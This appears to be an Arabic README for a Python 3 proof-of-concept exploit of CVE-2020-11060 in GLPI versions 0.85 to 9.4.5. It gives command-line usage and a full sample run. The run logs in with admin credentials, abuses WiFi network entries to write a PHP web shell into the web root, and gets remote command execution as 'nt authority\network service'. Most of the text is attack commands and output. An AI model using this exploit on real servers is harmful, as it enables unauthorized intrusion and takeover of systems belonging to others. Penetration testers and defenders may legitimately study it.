
Python3 POC لـ CVE 2020-11060
هذا النص البرمجي هو استغلال مبني على Python 3.x للثغرة CVE-2020-11060 في إصدارات GLPI 0.85-9.4.5.
التطبيق الأصلي: 0xdreadnaught
إعادة هيكلة لـ Python 3: n3rada
PoC الأصلي في ExploitDB أصبح الآن مهملاً لأنه استخدم Python 2.x. تم تقديم الإصدار الجديد، وسيتم إضافة رابط هنا عند قبوله إذا حدث ذلك. البحث الأصلي حول الثغرة المستخدم لبناء هذه الـ PoCs تم إجراؤه بواسطة AlmondOffSec، ويمكن العثور عليه هنا.
python3 CVE-2020-11060.py --url 'http://<target URL>' --user <'user'> --password <'password'> --platform <win/nix> --offset <#>
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne' --user 'glpi_adm' --password 'Amvfd6565/432' --platform 'win' --offset 312
[+] GLPI Browser targeting 'http://glpi.vul.ne' ('windows') with following credentials: 'glpi_adm':'Amvfd6565/432'.
[+] الهدف قيد التشغيل ويستجيب.
[+] المستخدم 'glpi_adm' مسجل الدخول.
------------------------- المحاولة رقم 1 -------------------------
[*] جاري مسح الشبكات...
حذف معرف الشبكة: 2413
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
ESSID الجديد: RCEe
[+] اسم الشيل الحالي: bQznfdTr.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\bQznfdTr.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/bQznfdTr.php
[+] حجم الشيل: 265
------------------------- المحاولة رقم 2 -------------------------
[*] جاري مسح الشبكات...
حذف معرف الشبكة: 2414
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
ESSID الجديد: RCEee
[+] اسم الشيل الحالي: HdqrmKtR.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\HdqrmKtR.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/HdqrmKtR.php
[+] حجم الشيل: 13882
------------------------- المحاولة رقم 3 -------------------------
[*] جاري مسح الشبكات...
حذف معرف الشبكة: 2415
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
ESSID الجديد: RCEeee
[+] اسم الشيل الحالي: dwmfIJgN.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\dwmfIJgN.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/dwmfIJgN.php
[+] حجم الشيل: 13885
------------------------- المحاولة رقم 4 -------------------------
[*] جاري مسح الشبكات...
حذف معرف الشبكة: 2416
[+] تم إنشاء الشبكة
[+] جاري تعديل الشبكة
ESSID الجديد: RCEeeee
[+] اسم الشيل الحالي: KmGsYHBw.php
[*] جاري تفريغ قاعدة البيانات عن بُعد في: C:\xampp\htdocs\sound\KmGsYHBw.php
[+] تم تفريغ الملف، يمكن الوصول إليه على: http://glpi.vul.ne/sound/KmGsYHBw.php
[+] حجم الشيل: 8369
------------------------------------------------------------------
[+] تم العثور على RCE بعد 4 محاولات!
[+] يمكنك تنفيذ الأوامر عن بُعد كـ: nt authority\network service@WIN03
[+] قم بتشغيل هذه الأداة مرة أخرى مع الأمر المطلوب لحقنه:
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'desired_command_here'
بعد ذلك، يمكنك تنفيذ أمر بحرية مثل:
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'whoami'
وسيعيد:
[*] تم استلام الرد من 'http://glpi.vul.ne/sound/KmGsYHBw.php':
nt authority\network service